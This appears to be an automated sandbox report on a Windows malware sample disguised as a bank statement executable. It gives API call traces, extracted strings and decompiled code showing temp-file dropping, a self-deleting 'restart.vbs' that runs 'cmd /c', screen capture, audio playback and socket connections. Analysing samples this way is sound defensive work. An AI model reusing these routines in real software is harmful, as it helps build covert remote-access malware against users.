                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                        • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                        • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                        • exit.MSVCRT ref: 0040AB2A
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DA4
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DBE
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DC8
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DE8
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E02
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E0C
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407E2C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2802067201-3088914985
                                        • Opcode ID: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                        • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                        • Opcode Fuzzy Hash: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                        • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 25%
                                        			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                        				char _v20;
                                        				char _v36;
                                        				char _v52;
                                        				char _v68;
                                        				char _v84;
                                        				char _v88;
                                        				char* _t35;
                                        				char* _t36;
                                        				char* _t37;
                                        				WCHAR* _t38;
                                        				void* _t43;
                                        				void* _t47;
                                        				intOrPtr* _t50;
                                        				intOrPtr _t78;
                                        				intOrPtr _t79;
                                        				intOrPtr _t86;
                                        				intOrPtr _t87;
                                        				intOrPtr* _t88;
                                        				void* _t91;
                                        
                                        				_t30 = __eax;
                                        				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                        				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t30 = E004135DE();
                                        					_t91 = _t91 + 0xc;
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				if(_t30 <= 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					if(PathFileExistsW(_t30) != 0) {
                                        						goto L4;
                                        					} else {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                        					}
                                        				} else {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                        					E00412E4E(_t30);
                                        					_t91 = _t91 - 0x10 + 0x14;
                                        					L4:
                                        					_t35 =  &_v68;
                                        					L0041416A();
                                        					_t36 =  &_v52;
                                        					L00414146();
                                        					_t37 =  &_v36;
                                        					L0041414C();
                                        					_t38 =  &_v20;
                                        					L00414146();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					mciSendStringW(_t38, 0, 0, 0);
                                        					mciSendStringA("play audio", 0, 0, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					E004020C2(0x41c178, 0xa9, 0x415664);
                                        					_t43 = CreateEventA(0, 1, 0, 0);
                                        					 *0x41c1d4 = _t43;
                                        					if(_t43 != 0) {
                                        						do {
                                        							if( *0x41c1d2 != 0) {
                                        								mciSendStringA("pause audio", 0, 0, 0);
                                        								 *0x41c1d2 = 0;
                                        							}
                                        							if( *0x41c1d3 != 0) {
                                        								mciSendStringA("resume audio", 0, 0, 0);
                                        								 *0x41c1d3 = 0;
                                        							}
                                        							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                        							_t50 = "stopped";
                                        							_t88 =  &_v88;
                                        							while(1) {
                                        								_t86 =  *_t88;
                                        								_t78 = _t86;
                                        								if(_t86 !=  *_t50) {
                                        									break;
                                        								}
                                        								if(_t78 == 0) {
                                        									L14:
                                        									_t50 = 0;
                                        								} else {
                                        									_t87 =  *((intOrPtr*)(_t88 + 1));
                                        									_t79 = _t87;
                                        									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                        										break;
                                        									} else {
                                        										_t88 = _t88 + 2;
                                        										_t50 = _t50 + 2;
                                        										if(_t79 != 0) {
                                        											continue;
                                        										} else {
                                        											goto L14;
                                        										}
                                        									}
                                        								}
                                        								goto L18;
                                        							}
                                        							asm("sbb eax, eax");
                                        							asm("sbb eax, 0xffffffff");
                                        							L18:
                                        							if(_t50 == 0) {
                                        								SetEvent( *0x41c1d4);
                                        							}
                                        							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                        								CloseHandle( *0x41c1d4);
                                        								 *0x41c1d4 = 0;
                                        							}
                                        						} while ( *0x41c1d4 != 0);
                                        					}
                                        					mciSendStringA("stop audio", 0, 0, 0);
                                        					mciSendStringA("close audio", 0, 0, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t47;
                                        			}


                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                        • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                        • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                        • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 1753768752-1354618412
                                        • Opcode ID: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                        • Opcode Fuzzy Hash: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                        • _wgetenv.MSVCRT ref: 00408A1B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                        • exit.MSVCRT ref: 00408B3D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                        • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                        • API String ID: 864010295-1332127163
                                        • Opcode ID: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                        • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                        • Opcode Fuzzy Hash: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                        • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                        • _itoa.MSVCRT ref: 0040F75C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
